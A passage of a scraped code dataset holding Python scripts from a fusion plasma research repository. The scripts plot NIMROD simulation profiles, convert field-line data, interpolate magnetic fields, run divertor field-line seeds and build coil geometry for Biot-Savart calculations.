$\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],frb[files[0]][:],'b',label=r'$f$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$f$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(332)\n plt.title(r'$\\mu_0 p$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],mu0_p[files[0]][:],'b',label=r'$\\mu_0p$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$mu_0p$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(333)\n plt.title(r'$q$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],qg[files[0]][:],'b',label=r'$q$')\n ax.axvline(x=rho[files[0]][irho2],color='g')\n ax.axvline(x=rho[files[0]][irho3],color='m')\n ax.axvline(x=rho[files[0]][irho4],color='orange')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$q$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(334)\n plt.title(r'$Mach$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],mach[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'${\\rm Mach}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(335)\n plt.title(r'$\\Omega_{E\\times B}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(336)\n plt.title(r'$\\Omega_{\\nabla P}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],omgp[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{\\nabla P}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(337)\n plt.title(r'$n$ v. 
$\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],n_den[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(338)\n plt.title(r'$ln(Residual)$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(rho[files[0]][:],residual[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$ln(Residual)$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n #plt.savefig('fgprofs1.png',bbox_inches='tight')\n\n plt.show()\n" }, { "alpha_fraction": 0.5871766209602356, "alphanum_fraction": 0.7345331907272339, "avg_line_length": 31.962963104248047, "blob_id": "4240ccaf6c324e996a2f73ff61404d7d78b41c8f", "content_id": "3d7e7317d7e0c8d533faab5c255798e66f5012a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 889, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/plotingScripts/nimflVisitConvert.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads a reads a nimfl.dat file and converts it to a plot 3D'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\nimport os\n\nhomeDir = os.environ['HOME']\nrelDir = \"/SCRATCH/166439/03300_2_equilbria/19091201_vac_lphi5_fp_deg50/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000_50deg/\"\n#relDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_restart/58000_50deg/\"\nrelDir = \"/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/26000/\"\nfileName = \"nimfl0026000.dat\"\nplot3Dfile = \"nimfl0026000.3D\"\n\nfullFile = homeDir+relDir+fileName\nfullOutFile = homeDir+relDir+plot3Dfile\n\npssData = np.loadtxt(fullFile)\nprint(pssData.shape)\n\nf = open(fullOutFile, \"wt\")\nf.write(\"x y z value\\n\")\nfor ii in range(pssData.shape[0]):\n f.write(\"%g %g %g %g\\n\" % (pssData[ii,0],pssData[ii,1],0.0,pssData[ii,2]))\nf.close()" }, { "alpha_fraction": 0.7707736492156982, "alphanum_fraction": 0.7765042781829834, "avg_line_length": 22.33333396911621, "blob_id": "2c52a26527ab72c91479015015d4481c5f3317b4", "content_id": "5f47585e8ff6e038033cf22186884d0fe5ecde08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 86, "num_lines": 15, "path": "/surfmnNim2/surfmn2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport sys\nimport xySliceClass as xy\nimport surfmnClass as mn\n\ndef main(argv):\n thisSurfmn=mn.SurfmnClass(argv)\n fields=xy.xyClass(thisSurfmn.xyFile,thisSurfmn.mx,thisSurfmn.my,thisSurfmn.pd,False)\n thisSurfmn.calcBmn(fields)\n thisSurfmn.plotBmn()\n print(thisSurfmn.xyFile)\n print(fields.ix.shape)\n\nmain(sys.argv[1:])" }, { "alpha_fraction": 0.5937665104866028, "alphanum_fraction": 0.6481775045394897, "avg_line_length": 26.05714225769043, "blob_id": 
"661a2fa299856dfdb07e607f0f00aff6d4ab1fbd", "content_id": "ffb5860796577053a07276be9febff608afbee63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": "no_license", "max_line_length": 100, "num_lines": 70, "path": "/trip2Nim/tripInterpolate2.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "''' Intepolate B(R,Z,PHI) from one set of RZ points onto a second set.\n\n'''\n\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhome_dir = os.environ['HOME']\nscratch_dir = home_dir + \"/SCRATCH\"\nold_file_dir = scratch_dir + \"/nimruns/echowell_runs/heatwidthscaling/166439/03300/EF_GRID_18121801\"\nprobe_gb_file = old_file_dir + \"/166439.03300.probe_gb.out\"\nnew_rz_dir = scratch_dir + \"/166439/03300_2_equilbria/19061201\"\nnew_rz_file = new_rz_dir + \"/nimrod_bdry_rz.txt\"\n\nb_data = np.loadtxt(probe_gb_file,comments='%')\nnew_rz = np.loadtxt(new_rz_file,skiprows=1,delimiter=',')\n\nphi_RZ_slices = []\nphi_B_slices = []\nphi_values = []\nphi_last = -100\nfirst_phi = True\nfor ii in range(b_data.shape[0]):\n if first_phi:\n first_phi = False\n start_index = ii\n phi_last = b_data[ii,0]\n count=1\n phi_values.append(phi_last)\n elif b_data[ii,0] == phi_last:\n count+=1\n else:\n thisRZ = np.zeros([count-1,2])\n thisB = np.zeros([count-1,3])\n thisRZ[:,0] = b_data[start_index:ii-1,1]\n thisRZ[:,1] = b_data[start_index:ii-1,2]\n thisB[:,0] = b_data[start_index:ii-1,4] #BR\n thisB[:,1] = b_data[start_index:ii-1,5] #BZ\n thisB[:,2] = b_data[start_index:ii-1,3] #Bphi\n phi_RZ_slices.append(thisRZ)\n phi_B_slices.append(thisB)\n phi_values.append(phi_last)\n start_index = ii\n phi_last = b_data[ii,0]\n count=1\n\nii=b_data.shape[0]\nthisRZ = np.zeros([count-1,2])\nthisB = np.zeros([count-1,3])\nthisRZ[:,0] = b_data[start_index:ii-1,1]\nthisRZ[:,1] = b_data[start_index:ii-1,2]\nthisB[:,0] = b_data[start_index:ii-1,4] #BR\nthisB[:,1] = b_data[start_index:ii-1,5] #BZ\nthisB[:,2] = b_data[start_index:ii-1,3] #Bphi\nphi_RZ_slices.append(thisRZ)\nphi_B_slices.append(thisB)\nphi_values.append(phi_last)\n \nprint(count)\nprint(phi_values)\nprint(b_data.shape)\n\n\nfor rz in phi_RZ_slices:\n plt.plot(rz[:,0],rz[:,1])\nplt.show()" }, { "alpha_fraction": 0.4686756432056427, "alphanum_fraction": 0.5103092789649963, "avg_line_length": 30.524999618530273, "blob_id": "7f50ac5e721eaf9d8026b7a2e82851e38a3c89b5", "content_id": "302fea11e64f31e6b50f2ac0804349f4cccce040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 79, "num_lines": 80, "path": "/nimflSeed/divSeedRun.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\nimport itertools as iter\nimport argparse\nimport pathlib\nimport subprocess\nfrom shutil import copy2\nimport os\n\nSEGMENTS = [\n ((1.016, 0.000), (1.016,-1.223)),\n ((1.016,-1.223), (1.153,-1.363)),\n ((1.153,-1.363), (1.372,-1.363)),\n ((1.372,-1.250), (1.682,-1.250))\n]\n\ndef write_start(file_name, rz, phi):\n npts = rz.shape[0]\n with open(file_name,'w') as thisFile:\n thisFile.write(str(npts)+\"\\n\")\n for idx, in np.ndindex(rz.shape[0]):\n thisLine = '{: 16.16e}'.format(rz[idx,0]) + \", \"\n thisLine+= '{: 16.16e}'.format(rz[idx,1]) + \", \"\n thisLine+= '{: 16.16e}'.format(phi) + \"\\n\"\n thisFile.write(thisLine)\n\ndef div_seed_runner(nimfl, dump, 
**kwargs):\n nphi = 360\n nl = 100\n dtan = 0.01\n phi_array = np.linspace(0, 2*np.pi, nphi, endpoint=False)\n BASENAME = \"start_positions.dat\"\n DIRNAME = \"temp_dir\"\n counter = 0\n for segment in SEGMENTS:\n start = np.array(segment[0])\n end = np.array(segment[1])\n tan = np.array([-end[1] + start[1], end[0] - start[0]])\n length = np.linalg.norm(tan)\n tan = dtan/length * tan\n l_arr = np.linspace(start,end,nl)\n l_arr = l_arr + tan\n for phi in np.nditer(phi_array):\n dir = DIRNAME + f\"_{counter}\"\n print(f\"Makeing dir {dir}\")\n try:\n os.mkdir(dir)\n except:\n print(f\"{dir} exists\")\n copy2(dump,dir)\n copy2('nimrod.in',dir)\n copy2('nimfl.in',dir)\n copy2('dmap_rz.dat',dir)\n #enter dir\n os.chdir(dir)\n file_name = BASENAME\n write_start(BASENAME, l_arr, phi)\n subprocess.run(nimfl)\n os.remove('nimrod.in')\n os.remove('nimfl.in')\n os.remove('dmap_rz.dat')\n os.remove(dump.name)\n os.chdir('../')\n counter += 1\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='NIMFL divertor plate runner')\n parser.add_argument('nimfl_exe',\n action='store',\n type=pathlib.Path,\n help=\"nimfl exectable path\" )\n parser.add_argument('dumpfile',\n action='store',\n type=pathlib.Path,\n help=\"dumpfile path\" )\n\n args = vars(parser.parse_args())\n\n div_seed_runner(args['nimfl_exe'], args['dumpfile'], **args)\n" }, { "alpha_fraction": 0.5931777358055115, "alphanum_fraction": 0.6217235326766968, "avg_line_length": 34.70512771606445, "blob_id": "6abb2f542bc2c9fc72fe08264e7f968136a1aa67", "content_id": "21c170c210a91d1619886e293acc9b854e5e6450", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5570, "license_type": "no_license", "max_line_length": 118, "num_lines": 156, "path": "/plotingScripts/qSurfaces.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport os\nimport h5py\n#import surfmnstep\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport fsa\nfrom shutil import copy2\n#import nim_timer as timer\nimport f90nml\nimport eval_nimrod as eval\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nimport labellines as ll\nimport matplotlib.ticker as ticker\n\n\nimport matplotlib.colors as mcolors\n\n#uses labelines package: https://github.com/cphyc/matplotlib-label-lines/\n#pip3 install matplotlib-label-lines\n\ndef dummy_fsa(rzc,y,dy,evalnimrod,fargs):\n '''\n Dummy integrand for fsa, this is used to get and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n#@timer.timer_func\ndef get_qsurfaces(dumpfile,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n qlist=[-1.25, -1.50, -2.0, -3.0,-4.0]\n qlist2=[-1.125,-1.75,-2.5,-3.5]\n evalNimrod=eval.EvalNimrod(dumpfile,fieldlist='b')\n#\n dvar, yvar, contours = fsa.FSA(evalNimrod, rzo, dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n Rq=interp1d(dvar[7,:iend], dvar[4,:iend], kind='cubic',fill_value=\"extrapolate\")\n Zq=interp1d(dvar[7,:iend], dvar[5,:iend], kind='cubic',fill_value=\"extrapolate\")\n\n 
contourdict={}\n for iq in qlist:\n iyvar, icontour = fsa.FSA(evalNimrod,rzo, dummy_fsa, 1, \\\n nsurf=1,depvar='eta',dpow=0.5,rzp=[Rq(iq),Zq(iq)],flag=eqflag,normalize=True, \\\n fargs=fargs)\n contourdict[iq]=icontour\n\n contourdict2={}\n for iq in qlist2:\n iyvar, icontour = fsa.FSA(evalNimrod,rzo, dummy_fsa, 1, \\\n nsurf=1,depvar='eta',dpow=0.5,rzp=[Rq(iq),Zq(iq)],flag=eqflag,normalize=True, \\\n fargs=fargs)\n contourdict2[iq]=icontour\n\n return contourdict, contourdict2\n\ndef q_runner(fileName,plot,pickle,args):\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_pre=[\"ntm\"]\n pickle_suf=[\"pickle\"]\n nimrodin=\"nimrod.in\"\n pre=fileName.split('.')[0]\n step=fileName.split('.')[1]\n if pre in dump_pre:\n print(f\"Performing ntm analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not fileName.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n nsurf=args.get(\"nsurf\",150)\n fargs={}\n eqflag=args.get(\"eqflag\",1)\n print(fileName)\n qsurfaces, qsurfaces2=get_qsurfaces(fileName,rzo=np.array(args['rzo']),nsurf=nsurf,fargs=fargs)\n # timer.timer.print_times()\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n pass\n # ntm.dump(file)\n elif pre in pickle_pre:\n pass\n #print(\"pickle_pre\")\n #ntm=step.ntmstep(None,None)\n #ntm.load(file_name)\n #print(f\"Time: {ntm.time}\" )\n #ntm.plot_fsa_phase(key=None)\n# with open(file_name,'rb') as file:\n# surf=surfmn.fsasurfmn(None,None)\n# surf.load(file)\n else:\n #print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n#plot data here\n if plot:\n xvals=[]\n llTune=8\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.title(\"Equilibrium q-surfaces\",size=16)\n for ii, [iq, isurface] in enumerate(qsurfaces.items()):\n plt.plot(isurface[0,:],isurface[1,:],label=f\"{iq}\",ls='-')\n xvals.append(isurface[0,int((3*ii)%llTune*isurface.shape[1]/llTune)])\n for ii, [iq, isurface] in enumerate(qsurfaces2.items()):\n plt.plot(isurface[0,:],isurface[1,:],ls='-',color='k', linewidth=1)\n plt.scatter( 1.76893653, -0.01890057, marker='.',color='k',s=4)\n ll.labelLines(plt.gca().get_lines(),xvals=xvals,fontsize=10)\n ax.set_xlabel(r\"R [m]\",size=16)\n ax.set_ylabel(r\"Z [m]\",size=16,rotation=90)\n ax.tick_params(axis='both', which='major', labelsize=16)\n ax.yaxis.set_major_locator(ticker.MultipleLocator(0.5))\n ax.xaxis.set_major_locator(ticker.MultipleLocator(0.5))\n #ax.set_xlim([1,2.5])\n plt.axis('equal')\n plt.tight_layout()\n plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='plots eq q surfaces runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--nsurf', type=int, default=150, help=\"number of surfaces\")\n parser.add_argument('--eqflag', type=int, default=1, help=\"flag to add n=0 perturbation to eq\")\n parser.add_argument('--rzo',type=float, nargs=3, default=[1.768,-0.018831,0.0], help=\"intial guess for o-point\")\n args = vars(parser.parse_args())\n print(args)\n q_runner(fileName=args['file'],plot=args['plot'],\\\n pickle=args['pickle'],args=args)\n" }, { "alpha_fraction": 0.5234419703483582, 
"alphanum_fraction": 0.5628930926322937, "avg_line_length": 32, "blob_id": "dcea3aa23b9396432ef8ac6c44868d386065705b", "content_id": "01e58d44c4c4bb9d2d5c9a888ae60eb8d6bad4c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3498, "license_type": "no_license", "max_line_length": 71, "num_lines": 106, "path": "/biotSavart/coilClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# coil class\n# \n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass coil:\n coilType=''\n coilId=0\n current=0.0\n segments=0\n xyz=np.zeros([0])\n def __init__(self,current,segment):\n self.current=current\n self.segments=segment\n self.xyz=np.zeros([3,self.segments+1])\n def planarCoil(self,x0,y0,z0,r,tx,ty,tz):\n #Initalize an coil around r0, with radius r\n # t1 and t2 are the rotation angles are the x0 and y0 axis\n\n self.coilType='planar'\n costx=np.cos(tx)\n costy=np.cos(ty)\n costz=np.cos(tz)\n sintx=np.sin(tx)\n sinty=np.sin(ty)\n sintz=np.sin(tz)\n rotxMat = np.zeros([3,3])\n rotyMat = np.zeros([3,3])\n rotzMat = np.zeros([3,3])\n \n rotxMat[0,0] = 1.0\n rotxMat[1,1] = costx\n rotxMat[1,2] = -sintx\n rotxMat[2,1] = sintx\n rotxMat[2,2] = costx\n\n rotyMat[0,0] = costy\n rotyMat[0,2] = sinty\n rotyMat[1,1] = 1.0\n rotyMat[2,0] = -sinty\n rotyMat[2,2] = costy\n\n rotzMat[0,0] = costz\n rotzMat[0,1] = -sintz\n rotzMat[1,0] = sintz\n rotzMat[1,1] = costz\n rotzMat[2,2] = 1.0\n\n rotMat = np.matmul(rotzMat,np.matmul(rotyMat,rotxMat))\n thisXYZ=np.zeros([3])\n theta=np.linspace(0,2*np.pi,num=self.segments+1)\n for iT, thisT in enumerate(theta):\n thisXYZ[0]= r * np.cos(thisT)\n thisXYZ[1]= r * np.sin(thisT)\n thisXYZ[2]= 0.0\n self.xyz[:,iT]=np.matmul(rotMat,thisXYZ)\n self.xyz[0,iT]+=x0\n self.xyz[1,iT]+=y0\n self.xyz[2,iT]+=z0\n# make sure the coil is periodic\n self.xyz[:,self.segments]=self.xyz[:,0]\n def cCoil(self,cCoilId):\n self.coilType='cCoil'\n self.coilId = cCoilId\n r0 = 3.2 #radius of C Coil\n zTop = 0.8 #C coils have a height of 1.6m\n zBottom = -0.8\n\n# I assume that the coils are composed of 4 segments\n# each has equal number of line segments. Test to see if the \n# number of segments is divisble by 4\n if(self.segments%4 !=0):\n sys.exit(\"c Coil segments must be divisble by 4\")\n segsPerSec = int(self.segments/4)\n\n phiStart = (-1.0 + (cCoilId-1) * 2.0)/(6.) *np.pi\n phiEnd = ( 1.0 + (cCoilId-1) * 2.0)/(6.) *np.pi\n phi=np.linspace(phiStart,phiEnd,num=segsPerSec+1)\n z =np.linspace(zBottom, zTop, num=segsPerSec+1)\n for ii in range(segsPerSec):\n#top\n self.xyz[0,ii] = r0 * np.cos(phi[ii])\n self.xyz[1,ii] = r0 * np.sin(phi[ii])\n self.xyz[2,ii] = zTop\n#right\n self.xyz[0,ii+segsPerSec]=r0 * np.cos(phiEnd)\n self.xyz[1,ii+segsPerSec]=r0 * np.sin(phiEnd)\n self.xyz[2,ii+segsPerSec]=z[segsPerSec-ii]\n#bottom\n self.xyz[0,ii+2*segsPerSec]=r0 * np.cos(phi[segsPerSec-ii])\n self.xyz[1,ii+2*segsPerSec]=r0 * np.sin(phi[segsPerSec-ii])\n self.xyz[2,ii+2*segsPerSec]=zBottom\n#left\n self.xyz[0,ii+3*segsPerSec]=r0 * np.cos(phiStart)\n self.xyz[1,ii+3*segsPerSec]=r0 * np.sin(phiStart)\n self.xyz[2,ii+3*segsPerSec]=z[ii]\n self.xyz[:,self.segments]=self.xyz[:,0]\n def plot_coil(self,axis):\n axis.plot(self.xyz[0,:],self.xyz[1,:],self.xyz[2,:])\n\n def plot_2D_coil(self,axis,coilcolor):\n axis.plot(self.xyz[0,:],self.xyz[2,:],color=coilcolor)\n" } ]
78
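A minimal sketch of the intrinsic rotation used by `planarCoil` in the `coilClass.py` entry above: the coil is traced as a circle in the x-y plane, rotated by composing elementary rotations about the x, y and z axes (R = Rz·Ry·Rx), and then translated to its centre (x0, y0, z0). The helper names `rotation_matrix` and `make_planar_coil` are illustrative only and do not appear in the repository.

```python
import numpy as np

def rotation_matrix(tx, ty, tz):
    """Compose R = Rz @ Ry @ Rx from rotation angles about the x, y and z axes (radians)."""
    cx, sx = np.cos(tx), np.sin(tx)
    cy, sy = np.cos(ty), np.sin(ty)
    cz, sz = np.cos(tz), np.sin(tz)
    rx = np.array([[1, 0, 0], [0, cx, -sx], [0, sx, cx]])
    ry = np.array([[cy, 0, sy], [0, 1, 0], [-sy, 0, cy]])
    rz = np.array([[cz, -sz, 0], [sz, cz, 0], [0, 0, 1]])
    return rz @ ry @ rx

def make_planar_coil(x0, y0, z0, r, tx, ty, tz, segments=64):
    """Return an array of shape (3, segments+1) tracing a closed circular coil."""
    theta = np.linspace(0.0, 2.0 * np.pi, segments + 1)
    pts = np.vstack((r * np.cos(theta), r * np.sin(theta), np.zeros_like(theta)))
    pts = rotation_matrix(tx, ty, tz) @ pts       # rotate the flat circle
    return pts + np.array([[x0], [y0], [z0]])     # then translate its centre

# Example: a 0.1 m radius coil centred at the origin, tilted 30 degrees about x.
coil_xyz = make_planar_coil(0.0, 0.0, 0.0, 0.1, np.pi / 6, 0.0, 0.0)
```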
jeffreywolf/expectedError
https://github.com/jeffreywolf/expectedError
4da2d5bfbee07ab194f5b82e1e8feb89dc0da69a
648d2b6deae2e401d22f59e3203cea5c148c30b4
92f1f02ae32c4faa5028e6b6f7030968b211d17d
refs/heads/master
2016-08-04T21:03:48.251509
2015-01-19T17:29:19
2015-01-19T17:29:19
29,446,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5912795662879944, "alphanum_fraction": 0.6055419445037842, "avg_line_length": 18.322834014892578, "blob_id": "cc9bcc5aa40f1ae593a74f7ee361bfc934d1f518", "content_id": "9ae149c16ddd344cc5c71db01f78059415168100", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "permissive", "max_line_length": 64, "num_lines": 127, "path": "/emax_threshold.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics thresholds summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport csv\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output file\"\n\t)\n\t\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\treturn parser.parse_args()\n\ndef firstT(arr):\n\t\"\"\"Return index of first False. \n\t\"\"\"\n\timax = 0\n\tfor i, elem in enumerate(arr):\n\t\tif elem == True:\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn i-1\n\t\timax = i\n\treturn imax\n\ndef threshold(data):\n\t\"\"\"Determine position where X%% sequences kept at set Emax.\n\t\"\"\"\n\toutput = {}\n\tfor k, v in data.iteritems():\n\t\toutput[k] = {}\n\t\tpercent_25 = data[k][\"percent\"] > 25.0\n\t\ti = firstT(percent_25)\n\t\toutput[k][\"25\"]=data[k][\"L\"][i]\n\t\tpercent_50 = data[k][\"percent\"] > 50.0\n\t\ti = firstT(percent_50)\n\t\toutput[k][\"50\"]=data[k][\"L\"][i]\n\t\tpercent_75 = data[k][\"percent\"] > 75.0\n\t\ti = firstT(percent_75)\n\t\toutput[k][\"75\"]=data[k][\"L\"][i]\n\treturn output\n\ndef summarize(data, args):\n\t\"\"\"Write summary of thresholds to file.\n\t\"\"\"\n\tcount = 0\n\theader = \"EE,Percent,L\\n\"\n\twith open(args.output, \"w\") as f:\n\t\tf.write(header)\n\t\tfor EE, value in data.iteritems():\n\t\t\tfor percent, L in value.iteritems():\n\t\t\t\trow = \"{},{},{}\\n\".format(\n\t\t\t\t\tEE,\n\t\t\t\t\tpercent,\n\t\t\t\t\tL\n\t\t\t\t)\n\t\t\t\tf.write(row)\n\t\t\t\tcount += 1\n\t\t\t\tif args.verbose:\n\t\t\t\t\tprint row,\n\treturn count\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\n\t# input data\n\tdata = {}\n\twith open(args.input, \"rUb\") as f:\n\t\tcsv_reader = csv.reader(f, delimiter=\",\")\n\t\tfor i, row in enumerate(csv_reader):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tEmax, L, percent = row[0], row[1], float(row[3])\n\t\t\ttry:\n\t\t\t\tdata[Emax]\n\t\t\texcept KeyError:\n\t\t\t\tdata[Emax]={}\n\t\t\ttry:\n\t\t\t\tdata[Emax][\"L\"].append(L)\n\t\t\t\tdata[Emax][\"percent\"].append(percent)\n\t\t\texcept KeyError:\n\t\t\t\tdata[Emax][\"L\"] = [L]\n\t\t\t\tdata[Emax][\"percent\"] = [percent]\n\n\t# Convert to numpy arrays\n\tfor k, v in 